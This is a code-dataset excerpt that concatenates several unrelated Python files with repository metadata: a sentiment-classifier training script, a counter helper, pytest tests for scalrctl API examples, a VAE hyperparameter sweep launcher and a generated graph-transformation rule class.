print("Training %s" % ("Random Forest" if training_model == "RF" else "bagged tree"))
rfc = rfc.fit(train_vec, train_data_y)
print("OOB Score =", rfc.oob_score_)
pred = rfc.predict(test_vec)
print('Precision = ' + str(metrics.precision_score(test_data_y, pred, average=None)))
print('Recall = ' + str(metrics.recall_score(test_data_y, pred, average=None)))
print('F1 = ' + str(metrics.f1_score(test_data_y, pred, average=None)))
print('Accuracy = %.2f%%' % (metrics.accuracy_score(test_data_y, pred) * 100.0))
print('Confusion matrix = \n' + str(
metrics.confusion_matrix(test_data_y, pred, labels=[0, 1, 2])))
print('\nClassification Report:\n' + classification_report(test_data_y, pred,
target_names=target_names))
elif training_model == "NB":
nb = naive_bayes.MultinomialNB()
cv_score = cross_val_score(nb, train_vec, train_data_y, cv=10)
print("Training Naive Bayes")
print("CV Score = ", cv_score.mean())
nb = nb.fit(train_vec, train_data_y)
pred = nb.predict(test_vec)
print('Precision = ' + str(metrics.precision_score(test_data_y, pred, average=None)))
print('Recall = ' + str(metrics.recall_score(test_data_y, pred, average=None)))
print('F1 = ' + str(metrics.f1_score(test_data_y, pred, average=None)))
print('Accuracy = %.2f%%' % (metrics.accuracy_score(test_data_y, pred) * 100.0))
print('Confusion matrix = \n' + str(
metrics.confusion_matrix(test_data_y, pred, labels=[0, 1, 2])))
print('\nClassification Report:\n' + classification_report(test_data_y, pred,
target_names=target_names))
elif training_model == "SVM":
svc = svm.LinearSVC()
param = {'C': [1e15, 1e13, 1e11, 1e9, 1e7, 1e5, 1e3, 1e1, 1e-1, 1e-3, 1e-5]}
print("Training SVM")
svc = GridSearchCV(svc, param, cv=10)
svc = svc.fit(train_vec, train_data_y)
pred = svc.predict(test_vec)
print("Optimized parameters:", svc.best_estimator_)
print("Best CV score:", svc.best_score_)
print('Precision = ' + str(metrics.precision_score(test_data_y, pred, average=None)))
print('Recall = ' + str(metrics.recall_score(test_data_y, pred, average=None)))
print('F1 = ' + str(metrics.f1_score(test_data_y, pred, average=None)))
print('Accuracy = %.2f%%' % (metrics.accuracy_score(test_data_y, pred) * 100.0))
print('Confusion matrix = \n' + str(
metrics.confusion_matrix(test_data_y, pred, labels=[0, 1, 2])))
print('\nClassification Report:\n' + classification_report(test_data_y, pred,
target_names=target_names))
# Output the results
if write_to_csv:
output = pd.DataFrame(data={"id": test_data.id, "sentiment": pred})
output.to_csv("submission.csv", index=False)
print('Time to Train and Test: ' + str(time.time() - current_time) + 's')
| 37.794554
| 116
| 0.653088
|
c2f4b3c02eb2f730f704bd2c88c43da560caa5ac
| 158
|
py
|
Python
|
neurobiba/helpers.py
|
rundleman/neurobiba
|
2fc0a05b71b83fa1b2a621575c43ef08762b0161
|
[
"MIT"
] | null | null | null |
neurobiba/helpers.py
|
rundleman/neurobiba
|
2fc0a05b71b83fa1b2a621575c43ef08762b0161
|
[
"MIT"
] | null | null | null |
neurobiba/helpers.py
|
rundleman/neurobiba
|
2fc0a05b71b83fa1b2a621575c43ef08762b0161
|
[
"MIT"
] | null | null | null |
def counter():
def count():
nonlocal value
value += 1
return value
value = -1
return count
default_counter = counter()
| 13.166667
| 27
| 0.550633
|
01f4bb1a65d9c6acc73567edb26763e241595669
| 1,576
|
py
|
Python
|
tests/small/test_examples.py
|
Scalr/pecha
|
40525bfca9fe2bea319ac18ea454a24ead5c405a
|
[
"Apache-2.0"
] | 8
|
2016-07-21T13:03:22.000Z
|
2020-07-18T13:34:09.000Z
|
tests/small/test_examples.py
|
Scalr/scalr-ctl
|
40525bfca9fe2bea319ac18ea454a24ead5c405a
|
[
"Apache-2.0"
] | 18
|
2016-04-04T16:00:23.000Z
|
2019-04-17T12:04:15.000Z
|
tests/small/test_examples.py
|
Scalr/pecha
|
40525bfca9fe2bea319ac18ea454a24ead5c405a
|
[
"Apache-2.0"
] | 8
|
2017-01-03T00:13:18.000Z
|
2019-05-14T17:53:40.000Z
|
# -*- coding: utf-8 -*-
import json
import pytest
import requests
from scalrctl import defaults, examples
@pytest.fixture(scope="module")
def specs():
data = {}
for api_level in defaults.API_LEVELS:
data[api_level] = json.loads(examples._read_spec(api_level))
return data
@pytest.fixture(scope="module")
def post_endpoints(specs):
endpoints = []
for api_level, spec_data in specs.items():
for endpoint, params_spec in spec_data['paths'].items():
if 'post' in params_spec:
endpoints.append((api_level, endpoint))
return endpoints
def _is_valid_endpoint(endpoint):
return not ('/actions/' in endpoint or endpoint in examples.EXCLUDES)
def test_create_post_example(post_endpoints):
for api_level, endpoint in post_endpoints:
try:
examples.create_post_example(api_level, endpoint)
except Exception as e:
assert not _is_valid_endpoint(endpoint) \
and str(e) == 'Invalid API endpoint'
else:
assert _is_valid_endpoint(endpoint)
def test_get_object_name(specs, post_endpoints):
for api_level, endpoint in post_endpoints:
if _is_valid_endpoint(endpoint):
object_name = examples.get_definition(specs[api_level], endpoint)
doc_url = examples.get_doc_url(api_level, endpoint)
resp = requests.get(doc_url)
assert resp.status_code == 200
assert '<p>The JSON representation of a {} ' \
'object.</p>'.format(object_name) in resp.text
| 30.307692
| 77
| 0.659898
|
22b1bdde359a0529302800fc07b9b14fab847347
| 819
|
py
|
Python
|
vae_sweep.py
|
dedbox/TOAD-GAN
|
8a0a84d10f9c5975ae4b1c54f7da99567c8ffd67
|
[
"MIT"
] | 1
|
2021-03-26T21:05:54.000Z
|
2021-03-26T21:05:54.000Z
|
vae_sweep.py
|
dedbox/TOAD-GAN
|
8a0a84d10f9c5975ae4b1c54f7da99567c8ffd67
|
[
"MIT"
] | null | null | null |
vae_sweep.py
|
dedbox/TOAD-GAN
|
8a0a84d10f9c5975ae4b1c54f7da99567c8ffd67
|
[
"MIT"
] | null | null | null |
import subprocess
levels = ['lvl_1-1.txt'] #, 'lvl_1-3.txt']
N = 5
# for level in levels:
# for L in range(0, 49, N):
# print("=" * 80)
# print(f'I={level} H=24 L={list(range(L+1,L+N+1))}')
# procs = [subprocess.Popen(f"python VAE_patches2.py --input-name {level} --hidden-dim 24 --latent-dim {L+i+1} --vae-show true --vae-save true", shell=True) for i in range(N)]
# for p in procs:
# p.wait()
for level in levels:
for H in range(0, 50, N):
print("=" * 80)
print(f'I={level} H={list(range(H+1,H+N+1))} L=7')
procs = [subprocess.Popen(f"python VAE_patches2.py --input-name {level} --latent-dim 7 --hidden-dim {H+i+1} --vae-show true --vae-save true", shell=True) for i in range(N)]
for p in procs:
p.wait()
| 37.227273
| 183
| 0.549451
|
95a3668c4c56f3479dcc2578fb062a7dfebb4097
| 2,630
|
py
|
Python
|
GM2AUTOSAR_MM/Properties/from_eclipse/HM2_if_ConnectedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
GM2AUTOSAR_MM/Properties/from_eclipse/HM2_if_ConnectedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
GM2AUTOSAR_MM/Properties/from_eclipse/HM2_if_ConnectedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HM2_if_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HM2_if_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HM2_if_ConnectedLHS, self).__init__(name='HM2_if_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'M2_if')
# Set the node attributes
# Nodes that represent the edges of the property.
# Add the edges
self.add_edges([
])
# Add the attribute equations
self["equations"] = []
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| 42.419355
| 125
| 0.482129
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.